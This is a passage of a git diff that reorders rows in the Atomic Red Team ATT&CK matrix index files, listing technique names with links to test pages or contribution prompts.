[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | +| | | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | +| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | | +| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Systemd Timers](../../T1053.006/T1053.006.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | | +| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | | +| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | | +| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Security Support Provider](../../T1547.005/T1547.005.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | | +| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | +| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | | +| | | [Startup Items](../../T1037.005/T1037.005.md) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | | +| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Service](../../T1543.003/T1543.003.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | | +| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | | +| | | [Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | | | | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | | | | | [Trap](../../T1546.005/T1546.005.md) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Web Shell](../../T1505.003/T1505.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Windows Service](../../T1543.003/T1543.003.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | | -| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | | +| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Web Shell](../../T1505.003/T1505.003.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Windows Service](../../T1543.003/T1543.003.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | | +| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Process Injection](../../T1055/T1055.md) | | | | | | | | | | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | | | | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 843aac23..2448302b 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -3,57 +3,61 @@ |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Local Accounts](../../T1078.003/T1078.003.md) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | -| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Service Discovery](../../T1007/T1007.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | -| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script 